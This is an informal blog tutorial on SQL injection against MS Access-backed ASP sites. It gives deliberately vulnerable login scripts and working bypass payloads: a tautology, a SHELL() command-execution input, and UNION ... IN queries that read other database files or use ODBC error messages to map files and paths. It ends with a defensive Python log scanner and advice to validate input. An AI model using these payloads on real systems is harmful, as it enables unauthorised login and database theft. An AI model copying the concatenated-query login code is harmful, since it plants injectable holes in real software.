Access SQL Injection

Nothing new here, move along. There's really nothing new here haha, but I want to share it because a lot of sites use MS Access as their database, especially ones built by Malaysian and Indonesian programmers. Why am I covering this? Because an MS Access database is the one most at risk of data theft. An attacker can use SQL syntax errors to find where the MS Access database file lives, hehe 😀, and then just download it.

Here is a step-by-step explanation of the process:

You need to know that MS Access has the following system tables; if permissions have been set on these tables, heh, then you're out of luck and can't access the file. Granting permissions only to specific users is one way to secure it.
****************************************************************************
% MS Access system tables
****************************************************************************
MSysACEs
MSysObjects
MSysQueries
MSysRelationships

This is an example of a script used for login
****************************************************************************
% MS Access command execution (older versions only), ancient stuff, weks
****************************************************************************
[Example authentication login script]

user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
' dsn is assumed to be defined elsewhere in the page
Conn.Open dsn
' user and pass are concatenated straight into the query: this is the injection point
SQL = "SELECT * FROM users where pass='" & pass & "' and user='" & user & "'"
Rs.Open SQL, Conn
if Rs.EOF and Rs.BOF then
' Access Denied
else
' Access Allowed
end if

[Auth can be bypassed as follows xixixi :D, come on, who has written a script like this?]

user = |SHELL("cmd.exe /c dir > c:\test.txt")|
pass = test

****************************************************************************
% Auth Bypass, the basic one lots of people use, though hopefully not anymore. Filter your input, dude..!
****************************************************************************
[Auth Page Script]

user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
' dsn is assumed to be defined elsewhere in the page
Conn.Open dsn
' unfiltered user and pass are concatenated into the query
SQL = "SELECT * FROM users where pass='" & pass & "' and user='" & user & "'"
Rs.Open SQL, Conn
if Rs.EOF and Rs.BOF then
' Access Denied
else
' Access Allowed
end if

[Auth script to bypass; there are still plenty out there like this wekekek]

user = ' or '1'='1
pass = test

****************************************************************************
% Auth Bypass, Simple
****************************************************************************
[Auth Page Script]

user = request("user")
pass = request("pass")
Set Conn = Server.CreateObject("ADODB.Connection")
Set Rs = Server.CreateObject("ADODB.Recordset")
' dsn is assumed to be defined elsewhere in the page
Conn.Open dsn
' only user is concatenated here; pass is compared in code after the query returns
SQL = "SELECT user,pass FROM users where user='" & user & "'"
Rs.Open SQL, Conn
if Rs.EOF and Rs.BOF then
' Access Denied
else
if (Rs("pass") = pass) then
' Access Allowed
else
' Access Denied
end if
end if

[Auth can be bypassed as follows using a file share]

user = ' union select name,password from table1 in '\\share\test\test.mdb
pass = password that is set in \\share\test\test.mdb

[Auth can be bypassed with a local mdb]

user = ' union select '0test','0test' from customers in 'C:\winnt\Help\iisHelp\iis\htm\tutorial\eecustmr.mdb'
pass = 0test

[Union Notes]

Remember that when using UNIONs, the ordering of the data causes the first record to be returned. Confused by my explanation? If so, just go and practise it, it'll make sense. OK 😛

****************************************************************************
% System path that isn't closed off
****************************************************************************
[Sql String]
user = test' union select names from msysobjects in '.

[ODBC Response]

Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] The Microsoft Jet database engine cannot open the file 'C:\WINNT\system32'.

Hehe, this means it is opened exclusively by another user, or you need permission to view the data in the database.

****************************************************************************
% Verify whether a file exists
****************************************************************************
[Sql String - non-existent file]
user = test' union select name from msysobjects in '\proof

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\proof'.

[Sql String - existing file]
user = test' union select name from msysobjects in '\proof.txt

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Unrecognized database format 'C:\proof.txt'.

****************************************************************************
% Verify whether a path exists
****************************************************************************
[Sql String - non-existent path]
test' union select name from msysobjects in '\nopath\sqlerr

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] 'C:\nopath\sqlerr' is not a valid path.
Make sure that the path name is spelled correctly and that you are connected to the server on which the file resides.

[Sql String - existing path]
user = test' union select name from msysobjects in '\inetpub\sqlerr

[ODBC Response]
Microsoft OLE DB Provider for ODBC Drivers (0x80004005)
[Microsoft][ODBC Microsoft Access Driver] Could not find file 'C:\inetpub\sqlerr'.
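As an added example (not part of the original post), here is a small Python scanner that flags the Access-specific probes shown in the sections above when they appear in IIS W3C log lines: Jet system table names, UNION SELECT ... IN '<path>' file-system probing, the |SHELL(...)| pipe trick, and the plain ' or '1'='1 tautology. The log field layout and the sample lines are constructed; only GET query strings are visible this way, since IIS does not log POST bodies.

```python
"""Flag MS Access / Jet-specific SQL injection probes in IIS W3C log lines."""
import re
from urllib.parse import unquote_plus

# Patterns drawn from the probes discussed above (all case-insensitive).
PATTERNS = {
    "jet_system_table": re.compile(r"\bmsys(objects|aces|queries|relationships)\b", re.I),
    # UNION SELECT ... IN '<path>' is how the file system / other .mdb files get probed
    "union_in_path":    re.compile(r"union\s+select\b.*?\bin\s*'[^']*", re.I | re.S),
    # |SHELL(...)| only works on old Jet versions, but is still worth alerting on
    "shell_pipe":       re.compile(r"\|\s*shell\s*\(", re.I),
    "tautology":        re.compile(r"'\s*or\s*'[^']*'\s*=\s*'", re.I),
}

# Constructed W3C layout: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
LOG_RE = re.compile(r"^(\S+) (\S+) (\S+) (\S+) (\S+) (\S+) (\d{3})$")

def scan_line(line):
    """Return (client_ip, uri_stem, [matched categories]) or None if the line is unparsable."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    _, _, ip, _, stem, query, _ = m.groups()
    # IIS logs the query string still percent-encoded; decode before matching
    decoded = unquote_plus(query) if query != "-" else ""
    hits = [name for name, rx in PATTERNS.items() if rx.search(decoded)]
    return ip, stem, hits

def scan_log(lines):
    """Return only the parsed lines that matched at least one pattern."""
    results = []
    for line in lines:
        parsed = scan_line(line)
        if parsed and parsed[2]:
            results.append(parsed)
    return results

# Constructed sample log: one normal login and three probes against login.asp
SAMPLE_LOG = [
    "2009-03-01 10:00:01 10.0.0.5 GET /login.asp user=budi&pass=rahasia 200",
    "2009-03-01 10:00:09 10.0.0.9 GET /login.asp user=%27+or+%271%27%3D%271&pass=test 200",
    "2009-03-01 10:01:13 10.0.0.9 GET /login.asp "
    "user=test%27+union+select+name+from+msysobjects+in+%27%5Cproof.txt&pass=x 500",
    "2009-03-01 10:01:20 10.0.0.9 GET /login.asp user=%7CSHELL%28%22cmd.exe+/c+dir%22%29%7C&pass=test 500",
]

if __name__ == "__main__":
    for ip, stem, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} {stem} -> {', '.join(hits)}")
```

Requests that return 500 alongside a hit are the ones where the ODBC error text above was most likely echoed back to the client, which is exactly the feedback the path-probing technique depends on.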

Finally, if you develop with MS Access or anything else, check your input. The above is an old hole, but you should know that while surfing some Indonesian and Malaysian government sites, weks, this bug is still there. Even worse when you hear that government sites are built with budgets in the billions; sad.

Thanks to Mamat Zone
